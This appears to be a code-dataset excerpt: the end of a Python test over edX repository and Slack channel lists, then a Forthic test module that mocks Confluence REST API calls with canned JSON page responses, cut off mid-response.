"https://github.com/edx/alton", "https://github.com/edx/opaque-keys", "https://github.com/edx/edx-analytics-data-api", "https://github.com/edx/i18n-tools", "https://github.com/edx/edx-submissions", "https://github.com/edx/edx-analytics-dashboard", "https://github.com/edx/django-oauth2-provider", "https://github.com/edx/edx-val", "https://github.com/edx/openedx-webhooks", "https://github.com/edx/edx-analytics-configuration", "https://github.com/edx/edx-analytics-data-api-client", "https://github.com/edx/edx-analytics-pipeline", "https://github.com/edx/edx-oauth2-provider", "https://github.com/edx/django-lang-pref-middleware", "https://github.com/edx/edx-documentation", "https://github.com/edx/luigi", "https://github.com/edx/xblock-utils", "https://github.com/edx/edx-fonts", "https://github.com/edx/edx-analytics-api-client", "https://github.com/edx/harprofiler", "https://github.com/edx/MongoDBProxy", "https://github.com/edx/edx-notes-api", "https://github.com/edx/edx-analytics-hadoop-util", "https://github.com/edx/edx-milestones", "https://github.com/edx/edx-django-profiler", "https://github.com/edx/edx-notifications", "https://github.com/edx/edx-app-ios", "https://github.com/edx/edx-app-android", "https://github.com/edx/edx-search", "https://github.com/edx/ux-pattern-library", "https://github.com/edx/pyinstrument", "https://github.com/edx/edx-lint", "https://github.com/edx/ecommerce", "https://github.com/edx/auth-backends", "https://github.com/edx/edx-app-gradle-plugin", "https://github.com/edx/testeng-ci", "https://github.com/edx/edx-reverification-block", "https://github.com/edx/edx-rest-api-client", "https://github.com/edx/thumb-stack", "https://github.com/edx/edx-common-client", "https://github.com/edx/edx-proctoring", "https://github.com/edx/edx-user-state-client", "https://github.com/edx/ecommerce-scripts", "https://github.com/edx/edx-organizations", "https://github.com/edx/ccx-keys", "https://github.com/edx/discussions", "https://github.com/edx/edx-load-tests", "https://github.com/edx/xsy", "https://github.com/edx/edx-ui-toolkit", "https://github.com/edx/openedx-conference-pages", "https://github.com/edx/django-rest-framework-oauth", "https://github.com/edx/cookiecutter-django-ida", "https://github.com/edx/programs", "https://github.com/edx/demo-performance-course", "https://github.com/edx/ecommerce-worker", "https://github.com/edx/django-openid-auth", "https://github.com/edx/django-pyfs", "https://github.com/edx/django-rest-framework", "https://github.com/edx/demo-test-course", "https://github.com/edx/build-pipeline", "https://github.com/edx/edx-custom-a11y-rules", "https://github.com/edx/django-splash", "https://github.com/edx/edx-analytics-exporter", "https://github.com/edx/xblock-lti-consumer", "https://github.com/edx/course-discovery", "https://github.com/edx/credentials", "https://github.com/edx/edx-django-extensions", "https://github.com/edx/edx-grader-support", "https://github.com/edx/tubular", "https://github.com/edx/dummy-webapp", "https://github.com/edx/edx-capa", "https://github.com/edx/edx-django-release-util", "https://github.com/edx/edx-drf-extensions", "https://github.com/edx/edx-django-sites-extensions", "https://github.com/edx/pa11ycrawler", "https://github.com/edx/open-edx-proposals", "https://github.com/edx/edx-icon", "https://github.com/edx/api-manager", "https://github.com/edx/sample-themes", "https://github.com/edx/jenkins-job-dsl", "https://github.com/edx/openedxstats", "https://github.com/edx/gomatic", "https://github.com/edx/edx-safety", "https://github.com/edx/edx-gomatic", "https://github.com/edx/eslint-config-edx", "https://github.com/edx/cookiecutter-django-app", "https://github.com/edx/vagrant-timer", "https://github.com/edx/edx-app-android-white-label-demo", "https://github.com/edx/cookiecutter-xblock", "https://github.com/edx/django-user-tasks", "https://github.com/edx/notifications", "https://github.com/edx/notifications-pipeline-steps", "https://github.com/edx/edx-sphinx-theme", "https://github.com/edx/django-config-models", "https://github.com/edx/edx-enterprise", "https://github.com/edx/web-fragments", "https://github.com/edx/devstack", "https://github.com/edx/pa11ycrawler-ignore", "https://github.com/edx/edx-celeryutils", "https://github.com/edx/edx-salesforce", "https://github.com/edx/credentials-themes", "https://github.com/edx/help-tokens", "https://github.com/edx/paragon", "https://github.com/edx/language-negotiation-lambda", "https://github.com/edx/edx-docker-base", "https://github.com/edx/jenkins-configuration", "https://github.com/edx/py-opt-cli", "https://github.com/edx/supported-components", "https://github.com/edx/bootstrapped", "https://github.com/edx/edx-bootstrap", "https://github.com/edx/edx-video-pipeline", "https://github.com/edx/edx-video-worker", "https://github.com/edx/ConceptXBlock", "https://github.com/edx/AudioXBlock", "https://github.com/edx/RecommenderXBlock", "https://github.com/edx/AnimationXBlock", "https://github.com/edx/RateXBlock", "https://github.com/edx/DoneXBlock", "https://github.com/edx/django-celery", "https://github.com/edx/edx-ace", "https://github.com/edx/studio-frontend", "https://github.com/edx/stylelint-config-edx", "https://github.com/edx/xblock-review", "https://github.com/edx/django-oauth-plus", "https://github.com/edx/edx-enterprise-data", "https://github.com/edx/analytics-python", "https://github.com/edx/edx-app-test", "https://github.com/edx/edx-app-qa", "https://github.com/edx/completion", "https://github.com/edx/openedx-census", "https://github.com/edx/frontend-cookie-cutter-application", "https://github.com/edx/journals", "https://github.com/edx/user-util", "https://github.com/edx/XSS-Linter", "https://github.com/edx/cookie-policy-banner", "https://github.com/edx/xapi-events", "https://github.com/edx/create-edx-react-app", "https://github.com/edx/docs.edx.org", "https://github.com/edx/chunkey", "https://github.com/edx/v_videocompile", "https://github.com/edx/edx-portal", "https://github.com/edx/cookie-cutter-react-component-library", "https://github.com/edx/floor-plan-connector", "https://github.com/edx/journals-frontend", "https://github.com/edx/django-plugins", "https://github.com/edx/edx-toggles", "https://github.com/edx/TinCanPython", "https://github.com/edx/edx-django-utils", "https://github.com/edx/frontend-cookiecutter-library", "https://github.com/edx/vertica_docker", "https://github.com/edx/xss-utils", "https://github.com/edx/frontend-auth", "https://github.com/edx/edx-developer-docs", "https://github.com/edx/gradebook", "https://github.com/edx/mockprock", "https://github.com/edx/code-annotations", "https://github.com/edx/cypress-e2e-tests", "https://github.com/edx/publisher-frontend", "https://github.com/edx/mdrst", "https://github.com/edx/frontend-component-footer", "https://github.com/edx/frontend-component-site-header", "https://github.com/edx/frontend-app-profile", "https://github.com/edx/hermes", "https://github.com/edx/registrar", "https://github.com/edx/asym-crypto-yaml", "https://github.com/edx/edx-rbac", "https://github.com/edx/edx-when", "https://github.com/edx/crowdsourcehinter", "https://github.com/edx/html-webpack-new-relic-plugin", "https://github.com/edx/frontend-app-learner-portal", "https://github.com/edx/frontend-analytics", "https://github.com/edx/frontend-logging", "https://github.com/edx/frontend-app-ecommerce", "https://github.com/edx/openedx-calc", "https://github.com/edx/frontend-app-account", "https://github.com/edx/frontend-common", "https://github.com/edx/edx-zoom", "https://github.com/edx/portal-designer", "https://github.com/edx/frontend-app-payment", "https://github.com/edx/openedx-chem", "https://github.com/edx/frontend-i18n", "https://github.com/edx/staff_graded-xblock", "https://github.com/edx/super-csv", "https://github.com/edx/frontend-app-program-manager", "https://github.com/edx/edx-bulk-grades", "https://github.com/edx/edx4edx_lite"], "slack": ["CE73RNA1J", "C18DN7JDR", "C1KMGGK7B", "CBJG9K5AB", "C1GV2QCTX", "C18CP8CFQ", "C0F4KLB5Z", "C9HL8MXRU", "CHYH0BDTR", "C321C5NVB", "C0RU5BTCP", "CDLBJS6FL", "CHJV96WS3", "C7U57FJ6M", "CFKQ54XD4", "C0NKZ5NQJ", "C5HEQHD6Y", "C0P4X6SQM", "C2X8RTMAR", "CK94QNCQ0", "CE3QFEETH", "CH95Z37A5", "C8VNEGK8S", "C0F584CH0", "CDH6K8ZK3", "C4913NQCE", "C116PL2SW", "C502JJBLN", "C0HN8M50D", "C0RE99TT4", "C0F22D6D7", "C1JL4UGVA", "C2YCNUJHG", "C1H96824B", "C13NSPFSP", "C1H7GU8VD", "C12M8M5AR", "CAXGT1PDJ", "C0MGYSC6A", "CHEU1FJ4V", "CDAG4KN2C", "CH37FF4AW", "CD93YLU9M", "C0EFVC6RK", "C1LM7G955", "C114ZRBPV", "C0WL6SPRA", "CBBLN5Q92", "CHFETNX88", "CCY2WTBK7", "C4RGQL82C", "C5EFG44P5", "C0HNBT5FT", "C9K3K46CR", "C1EDFL21M", "C5FRNT74L", "C4EAVJNNQ", "C67SNSHJB", "C0F0AD1HT", "C0YPSP0P5", "CD0H6H8P5", "CBL2US2G7", "CB1APK5D5", "CHJ7GA013", "C1K0A7BFD", "C0EUBSV7D", "C1HKV3BHV", "CA0DFM0FP", "C02SNA1U4", "C02SNEPU6", "CGSFKNDMW", "C1HF0SBA7", "C1HJ07C68", "C1HHWC8S0", "C2M6V63EV", "C2L5U7J5N", "C0PFZVB0E", "C1GS0DT7F", "CFS88FU59", "C0PG1BEAU", "C0PFYU9EV", "C0PFT4EG3", "C0PG0L40H", "C1HK3B5DY", "C0PFW2WKZ", "C0PG4D5GQ", "C1HF93HNX", "C3CBY0LBE", "C0PFZTVJN", "C3C7QUYLB", "C794AG9HP", "C1HHU62KW", "C91M88HD3", "CA9BS81T7", "CE90JM6SE", "CHFEUACKS", "C1KHYD4LT", "CFSA1T268", "CGEHJQK17", "C1N0RH6LD", "CHW5JSV9P", "C8SN0NWAC", "CA183QY2Y", "CGRU5KU6A", "CHSK2T70S", "C118NHV16", "C0DQBGEN4", "CFYRF14BZ", "C36B28HE0", "C1UEPR1FF", "C469C1QJZ", "CB29ZP7NJ", "C0F0FQS7R", "CB05HAGS2", "C4C6A836U", "C1QLT1H6D", "C70EXHW01", "C0GR05YC9", "CEJKH4VBK", "C0HRHFQ49", "C02SNEYAJ", "C5JKQTKAA", "C8VN7RGRF", "C0F0NA2F5", "C5HTRMS0J", "C1YNP01MJ", "CAY3F0BPD", "C02SNDNPC", "C2Q6MDF34", "C0F2FLRQU", "C26T5JFDX", "C0HDQ1A5P", "C0RKFAQEA", "C0X181LQ1", "C109EQPM1", "C1L370YTZ", "C20D9NWCT", "C0F63UDL0", "CH9SC5PRT", "CE6LE8WD7", "CHFCRQYDV", "CF5PSNV8S", "CJW040YMT", "C1DUYU95L", "C1HKGGL1J", "C1EH2UU07", "C586BMF5H", "C57P43CSV", "C5JFGF7FC", "C5JDBQMHS", "CAFM1HU3C", "CEJF3H52L", "CH974URD5", "C02SM402H", "C08B4LZEZ", "CELRNJ84E", "C4BTM66AW", "C26BW6LJF", "CJF1K4WKF", "CFPD5ECUB", "C0S120CBG", "C6DCAACSW", "CC4GBRA4X", "C116PL3LJ", "CD506K945", "CDB7T9K6E", "C1H7FTCTZ", "C02SUL70H", "C48CG81N0", "C0WKV86TH", "C02SNA1UC", "C0PG3FUE7", "C1X358B3K", "CCUR8HM62", "CDCCM2X7Z", "C0Q4B9YKS", "C52M3RZK2", "C1LE356SY", "CGB0S3L12", "C4YS3MLE4", "C0DQ7GA6P", "CAZ7N2SSX", "C0H4U6TFS", "C0G15M90X", "C9PPC2BHP", "CGE253B7V", "CH8LJ4ESG", "C1JRTS7T4", "C1P9TFUE7", "C1JQR69L6", "C1PB8HBFS", "C1P4K0685", "CCBJURJKY", "C1HJ0BT25", "C0GF6FTHA"]}}
create_projects(projects4, config1)
print("Number of repos: %s" % len(projects4["Open edX"]["git"]))
if len(projects4['Open edX']['slack']) == 154 and len(projects4['Open edX']['github']) == 224:
print('Test 4 Passed: Not filling data for Git and Slack')
else:
print('Test 4 failed')
| 179.601351 | 21,331 | 0.697114 | 3,627 | 26,581 | 5.093741 | 0.157982 | 0.270311 | 0.344032 | 0.417754 | 0.806333 | 0.789824 | 0.77456 | 0.774019 | 0.774019 | 0.768606 | 0 | 0.027015 | 0.079493 | 26,581 | 147 | 21,332 | 180.823129 | 0.728053 | 0.003649 | 0 | 0.166667 | 0 | 0 | 0.783457 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03125 | false | 0.041667 | 0.041667 | 0 | 0.104167 | 0.083333 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12 |
24c3036cbaebafec856f5342866ac0ae9493dd73 | 33,867 | py | Python | tests/tests_py/modules/confluence_context.py | absheik/forthic | 1d481f8a4c0c1cc7250eb5886bed43dfb4f201c0 | [
"BSD-2-Clause"
] | 6 | 2021-08-18T19:14:09.000Z | 2022-02-20T05:43:46.000Z | tests/tests_py/modules/confluence_context.py | absheik/forthic | 1d481f8a4c0c1cc7250eb5886bed43dfb4f201c0 | [
"BSD-2-Clause"
] | 1 | 2021-11-25T05:08:28.000Z | 2021-12-01T15:41:21.000Z | tests/tests_py/modules/confluence_context.py | absheik/forthic | 1d481f8a4c0c1cc7250eb5886bed43dfb4f201c0 | [
"BSD-2-Clause"
] | 1 | 2021-11-25T05:03:53.000Z | 2021-11-25T05:03:53.000Z | import json
from forthic.modules.confluence_module import ConfluenceContext
class ServerResponse:
def __init__(self, string, status_code=200):
self.json_string = string
self.status_code = status_code
self.text = ""
def json(self):
result = json.loads(self.json_string)
return result
class ConfluenceTestContext(ConfluenceContext):
def __init__(self):
self.page_created = False
def get_host(self):
return "http://testcontext"
def requests_get(self, api_url):
result = ServerResponse("null")
if api_url == '/wiki/cf/rest/api/content?title=A+page+title&spaceKey=SPACE&expand=version':
result = ServerResponse(PAGE_INFO_RESPONSE)
elif not self.page_created and api_url == '/wiki/cf/rest/api/content?title=A+new+page+title&spaceKey=SPACE&expand=ancestors':
result = ServerResponse(NO_PAGE_INFO_RESPONSE)
elif self.page_created and api_url == '/wiki/cf/rest/api/content?title=A+new+page+title&spaceKey=SPACE&expand=ancestors':
result = ServerResponse(PAGE_INFO_w_ANCESTORS_RESPONSE)
elif api_url == '/wiki/cf/rest/api/content?title=A+parent+title&spaceKey=SPACE&expand=version':
result = ServerResponse(PAGE_INFO_RESPONSE)
elif api_url == '/wiki/cf/rest/api/content?title=A+new+page+title&spaceKey=SPACE&expand=version':
result = ServerResponse(PAGE_INFO_RESPONSE)
else:
raise Exception(f"Unknown route: {api_url}")
return result
def requests_post(self, api_url, json=None):
result = ServerResponse("null")
if api_url == "/wiki/cf/rest/api/content":
self.page_created = True
result = ServerResponse(CREATE_PAGE_RESPONSE)
else:
raise Exception(f"Unknown route: {api_url}")
return result
def requests_put(self, api_url, json=None):
result = ServerResponse("null")
if api_url == '/wiki/cf/rest/api/content/1234':
result = ServerResponse(UPDATE_PAGE_RESPONSE)
else:
raise Exception(f"Unknown route: {api_url}")
return result
PAGE_INFO_RESPONSE = '''
{
"results": [
{
"id": "1234",
"type": "page",
"status": "current",
"title": "A page title",
"version": {
"by": {
"type": "known",
"username": "testuser",
"userKey": "2c9239b948dc82440148dc876925181a",
"profilePicture": {
"path": "/wiki/cf/images/icons/profilepics/default.svg",
"width": 48,
"height": 48,
"isDefault": true
},
"displayName": "Test User",
"_links": {
"self": "https://testcontext/wiki/cf/rest/api/user?key=2c9239b948dc82440148dc876925181a"
},
"_expandable": {
"status": ""
}
},
"when": "2020-10-23T16:54:50.000Z",
"message": "",
"number": 3,
"minorEdit": false,
"hidden": false,
"_links": {
"self": "https://testcontext/wiki/cf/rest/experimental/content/1234/version/3"
},
"_expandable": {
"content": "/rest/api/content/1234"
}
},
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/A+page+title",
"edit": "/pages/resumedraft.action?draftId=1234&draftShareId=0b59bcea-e6ea-44cc-a0b1-745f7d9e441d",
"tinyui": "/x/chcmFw",
"self": "https://testcontext/wiki/cf/rest/api/content/1234"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/1234/child",
"restrictions": "/rest/api/content/1234/restriction/byOperation",
"history": "/rest/api/content/1234/history",
"ancestors": "",
"body": "",
"descendants": "/rest/api/content/1234/descendant",
"space": "/rest/api/space/SPACE"
}
}
],
"start": 0,
"limit": 25,
"size": 1,
"_links": {
"self": "https://testcontext/wiki/cf/rest/api/content?spaceKey=SPACE&expand=version&title=A%20page%20title",
"base": "https://testcontext/wiki/cf",
"context": "/wiki/cf"
}
}
'''
NO_PAGE_INFO_RESPONSE ='''
{
"results": [],
"start": 0,
"limit": 25,
"size": 0,
"_links": {
"self": "https://testcontext/wiki/cf/rest/api/content?spaceKey=SPACE&expand=ancestors&title=A%20new%20page%20title",
"base": "https://testcontext/wiki/cf",
"context": "/wiki/cf"
}
}
'''
PAGE_INFO_w_ANCESTORS_RESPONSE = '''
{
"results": [
{
"id": "388386405",
"type": "page",
"status": "current",
"title": "A new page title",
"ancestors": [
{
"id": "119239646",
"type": "page",
"status": "current",
"title": "Space Home",
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/Space+Home",
"edit": "/pages/resumedraft.action?draftId=119239646",
"tinyui": "/x/3nMbBw",
"self": "https://testcontext/wiki/cf/rest/api/content/119239646"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/119239646/child",
"restrictions": "/rest/api/content/119239646/restriction/byOperation",
"history": "/rest/api/content/119239646/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/119239646/descendant",
"space": "/rest/api/space/SPACE"
}
},
{
"id": "148348821",
"type": "page",
"status": "current",
"title": "Project SPACE",
"extensions": {
"position": 85
},
"_links": {
"webui": "/display/SPACE/Project+SPACE",
"edit": "/pages/resumedraft.action?draftId=148348821",
"tinyui": "/x/lZ-XC",
"self": "https://testcontext/wiki/cf/rest/api/content/148348821"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/148348821/child",
"restrictions": "/rest/api/content/148348821/restriction/byOperation",
"history": "/rest/api/content/148348821/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/148348821/descendant",
"space": "/rest/api/space/SPACE"
}
},
{
"id": "148348824",
"type": "page",
"status": "current",
"title": "Forthic",
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/Forthic",
"edit": "/pages/resumedraft.action?draftId=148348824",
"tinyui": "/x/mJ-XC",
"self": "https://testcontext/wiki/cf/rest/api/content/148348824"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/148348824/child",
"restrictions": "/rest/api/content/148348824/restriction/byOperation",
"history": "/rest/api/content/148348824/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/148348824/descendant",
"space": "/rest/api/space/SPACE"
}
},
{
"id": "248042769",
"type": "page",
"status": "current",
"title": "Forthic Framework",
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/Forthic+Framework",
"edit": "/pages/resumedraft.action?draftId=248042769&draftShareId=e6dfb6e9-9a98-4e20-8afc-8fdfaa354ace",
"tinyui": "/x/EdXIDg",
"self": "https://testcontext/wiki/cf/rest/api/content/248042769"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/248042769/child",
"restrictions": "/rest/api/content/248042769/restriction/byOperation",
"history": "/rest/api/content/248042769/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/248042769/descendant",
"space": "/rest/api/space/SPACE"
}
},
{
"id": "261397943",
"type": "page",
"status": "current",
"title": "A parent title",
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/Forthic+Testing",
"edit": "/pages/resumedraft.action?draftId=261397943&draftShareId=5ebe725d-0d69-46a5-bf3f-5cd01d7c17c7",
"tinyui": "/x/t52UDw",
"self": "https://testcontext/wiki/cf/rest/api/content/261397943"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/261397943/child",
"restrictions": "/rest/api/content/261397943/restriction/byOperation",
"history": "/rest/api/content/261397943/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/261397943/descendant",
"space": "/rest/api/space/SPACE"
}
}
],
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/A+new+page+title",
"edit": "/pages/resumedraft.action?draftId=388386405",
"tinyui": "/x/ZU4mFw",
"self": "https://testcontext/wiki/cf/rest/api/content/388386405"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/388386405/child",
"restrictions": "/rest/api/content/388386405/restriction/byOperation",
"history": "/rest/api/content/388386405/history",
"body": "",
"version": "",
"descendants": "/rest/api/content/388386405/descendant",
"space": "/rest/api/space/SPACE"
}
}
],
"start": 0,
"limit": 25,
"size": 1,
"_links": {
"self": "https://testcontext/wiki/cf/rest/api/content?spaceKey=SPACE&expand=ancestors&title=A%20new%20page%20title",
"base": "https://testcontext/wiki/cf",
"context": "/wiki/cf"
}
}
'''
CREATE_PAGE_RESPONSE='''
{
"id": "388386403",
"type": "page",
"status": "current",
"title": "A new page title",
"space": {
"id": 119963668,
"key": "SPACE",
"name": "Space",
"type": "global",
"_links": {
"webui": "/display/SPACE",
"self": "https://testcontext/wiki/cf/rest/api/space/SPACE"
},
"_expandable": {
"metadata": "",
"icon": "",
"description": "",
"homepage": "/rest/api/content/119239646"
}
},
"history": {
"latest": true,
"createdBy": {
"type": "known",
"username": "SPACE-auto",
"userKey": "2c9239b948dc82440148dc875dc709a1",
"profilePicture": {
"path": "/wiki/cf/images/icons/profilepics/default.svg",
"width": 48,
"height": 48,
"isDefault": true
},
"displayName": "SPACE-auto",
"_links": {
"self": "https://testcontext/wiki/cf/rest/api/user?key=2c9239b948dc82440148dc875dc709a1"
},
"_expandable": {
"status": ""
}
},
"createdDate": "2020-10-30T15:48:59.311Z",
"_links": {
"self": "https://testcontext/wiki/cf/rest/api/content/388386403/history"
},
"_expandable": {
"lastUpdated": "",
"previousVersion": "",
"contributors": "",
"nextVersion": ""
}
},
"version": {
"by": {
"type": "known",
"username": "SPACE-auto",
"userKey": "2c9239b948dc82440148dc875dc709a1",
"profilePicture": {
"path": "/wiki/cf/images/icons/profilepics/default.svg",
"width": 48,
"height": 48,
"isDefault": true
},
"displayName": "SPACE-auto",
"_links": {
"self": "https://testcontext/wiki/cf/rest/api/user?key=2c9239b948dc82440148dc875dc709a1"
},
"_expandable": {
"status": ""
}
},
"when": "2020-10-30T15:48:59.311Z",
"message": "",
"number": 1,
"minorEdit": false,
"hidden": false,
"_links": {
"self": "https://testcontext/wiki/cf/rest/experimental/content/388386403/version/1"
},
"_expandable": {
"content": "/rest/api/content/388386403"
}
},
"ancestors": [
{
"id": "119239646",
"type": "page",
"status": "current",
"title": "Space Home",
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/Space+Home",
"edit": "/pages/resumedraft.action?draftId=119239646",
"tinyui": "/x/3nMbBw",
"self": "https://testcontext/wiki/cf/rest/api/content/119239646"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/119239646/child",
"restrictions": "/rest/api/content/119239646/restriction/byOperation",
"history": "/rest/api/content/119239646/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/119239646/descendant",
"space": "/rest/api/space/SPACE"
}
},
{
"id": "148348821",
"type": "page",
"status": "current",
"title": "Project SPACE",
"extensions": {
"position": 85
},
"_links": {
"webui": "/display/SPACE/Project+SPACE",
"edit": "/pages/resumedraft.action?draftId=148348821",
"tinyui": "/x/lZ-XC",
"self": "https://testcontext/wiki/cf/rest/api/content/148348821"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/148348821/child",
"restrictions": "/rest/api/content/148348821/restriction/byOperation",
"history": "/rest/api/content/148348821/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/148348821/descendant",
"space": "/rest/api/space/SPACE"
}
},
{
"id": "148348824",
"type": "page",
"status": "current",
"title": "Forthic",
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/Forthic",
"edit": "/pages/resumedraft.action?draftId=148348824",
"tinyui": "/x/mJ-XC",
"self": "https://testcontext/wiki/cf/rest/api/content/148348824"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/148348824/child",
"restrictions": "/rest/api/content/148348824/restriction/byOperation",
"history": "/rest/api/content/148348824/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/148348824/descendant",
"space": "/rest/api/space/SPACE"
}
},
{
"id": "248042769",
"type": "page",
"status": "current",
"title": "Forthic Framework",
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/Forthic+Framework",
"edit": "/pages/resumedraft.action?draftId=248042769&draftShareId=e6dfb6e9-9a98-4e20-8afc-8fdfaa354ace",
"tinyui": "/x/EdXIDg",
"self": "https://testcontext/wiki/cf/rest/api/content/248042769"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/248042769/child",
"restrictions": "/rest/api/content/248042769/restriction/byOperation",
"history": "/rest/api/content/248042769/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/248042769/descendant",
"space": "/rest/api/space/SPACE"
}
},
{
"id": "261397943",
"type": "page",
"status": "current",
"title": "A parent title",
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/Forthic+Testing",
"edit": "/pages/resumedraft.action?draftId=261397943&draftShareId=5ebe725d-0d69-46a5-bf3f-5cd01d7c17c7",
"tinyui": "/x/t52UDw",
"self": "https://testcontext/wiki/cf/rest/api/content/261397943"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/261397943/child",
"restrictions": "/rest/api/content/261397943/restriction/byOperation",
"history": "/rest/api/content/261397943/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/261397943/descendant",
"space": "/rest/api/space/SPACE"
}
}
],
"container": {
"id": 119963668,
"key": "SPACE",
"name": "Space",
"type": "global",
"_links": {
"webui": "/display/SPACE",
"self": "https://testcontext/wiki/cf/rest/api/space/SPACE"
},
"_expandable": {
"metadata": "",
"icon": "",
"description": "",
"homepage": "/rest/api/content/119239646"
}
},
"body": {
"storage": {
"value": "<h2>This is a test</h2>",
"representation": "storage",
"_expandable": {
"content": "/rest/api/content/388386403"
}
},
"_expandable": {
"editor": "",
"view": "",
"export_view": "",
"styled_view": "",
"anonymous_export_view": ""
}
},
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/A+new+page+title",
"edit": "/pages/resumedraft.action?draftId=388386403",
"tinyui": "/x/Y04mFw",
"collection": "/rest/api/content",
"base": "https://testcontext/wiki/cf",
"context": "/wiki/cf",
"self": "https://testcontext/wiki/cf/rest/api/content/388386403"
},
"_expandable": {
"metadata": "",
"operations": "",
"children": "/rest/api/content/388386403/child",
"restrictions": "/rest/api/content/388386403/restriction/byOperation",
"descendants": "/rest/api/content/388386403/descendant"
}
}
'''
UPDATE_PAGE_RESPONSE = '''
{
"id": "1234",
"type": "page",
"status": "current",
"title": "A new page title",
"space": {
"id": 119963668,
"key": "SPACE",
"name": "SPACE",
"type": "global",
"_links": {
"webui": "/display/SPACE",
"self": "https://testcontext/wiki/cf/rest/api/space/SPACE"
},
"_expandable": {
"metadata": "",
"icon": "",
"description": "",
"homepage": "/rest/api/content/119239646"
}
},
"history": {
"latest": true,
"createdBy": {
"type": "known",
"username": "SPACE-auto",
"userKey": "2c9239b948dc82440148dc875dc709a1",
"profilePicture": {
"path": "/wiki/cf/images/icons/profilepics/default.svg",
"width": 48,
"height": 48,
"isDefault": true
},
"displayName": "SPACE-auto",
"_links": {
"self": "https://testcontext/wiki/cf/rest/api/user?key=2c9239b948dc82440148dc875dc709a1"
},
"_expandable": {
"status": ""
}
},
"createdDate": "2020-10-30T15:58:05.590Z",
"_links": {
"self": "https://testcontext/wiki/cf/rest/api/content/388386405/history"
},
"_expandable": {
"lastUpdated": "",
"previousVersion": "",
"contributors": "",
"nextVersion": ""
}
},
"version": {
"by": {
"type": "known",
"username": "SPACE-auto",
"userKey": "2c9239b948dc82440148dc875dc709a1",
"profilePicture": {
"path": "/wiki/cf/images/icons/profilepics/default.svg",
"width": 48,
"height": 48,
"isDefault": true
},
"displayName": "SPACE-auto",
"_links": {
"self": "https://testcontext/wiki/cf/rest/api/user?key=2c9239b948dc82440148dc875dc709a1"
},
"_expandable": {
"status": ""
}
},
"when": "2020-10-30T16:29:18.318Z",
"number": 2,
"minorEdit": false,
"hidden": false,
"_links": {
"self": "https://testcontext/wiki/cf/rest/experimental/content/388386405/version/2"
},
"_expandable": {
"content": "/rest/api/content/388386405"
}
},
"ancestors": [
{
"id": "119239646",
"type": "page",
"status": "current",
"title": "SPACE Home",
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/SPACE+Home",
"edit": "/pages/resumedraft.action?draftId=119239646",
"tinyui": "/x/3nMbBw",
"self": "https://testcontext/wiki/cf/rest/api/content/119239646"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/119239646/child",
"restrictions": "/rest/api/content/119239646/restriction/byOperation",
"history": "/rest/api/content/119239646/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/119239646/descendant",
"space": "/rest/api/space/SPACE"
}
},
{
"id": "148348821",
"type": "page",
"status": "current",
"title": "Project SPACE",
"extensions": {
"position": 85
},
"_links": {
"webui": "/display/SPACE/Project+SPACE",
"edit": "/pages/resumedraft.action?draftId=148348821",
"tinyui": "/x/lZ-XC",
"self": "https://testcontext/wiki/cf/rest/api/content/148348821"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/148348821/child",
"restrictions": "/rest/api/content/148348821/restriction/byOperation",
"history": "/rest/api/content/148348821/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/148348821/descendant",
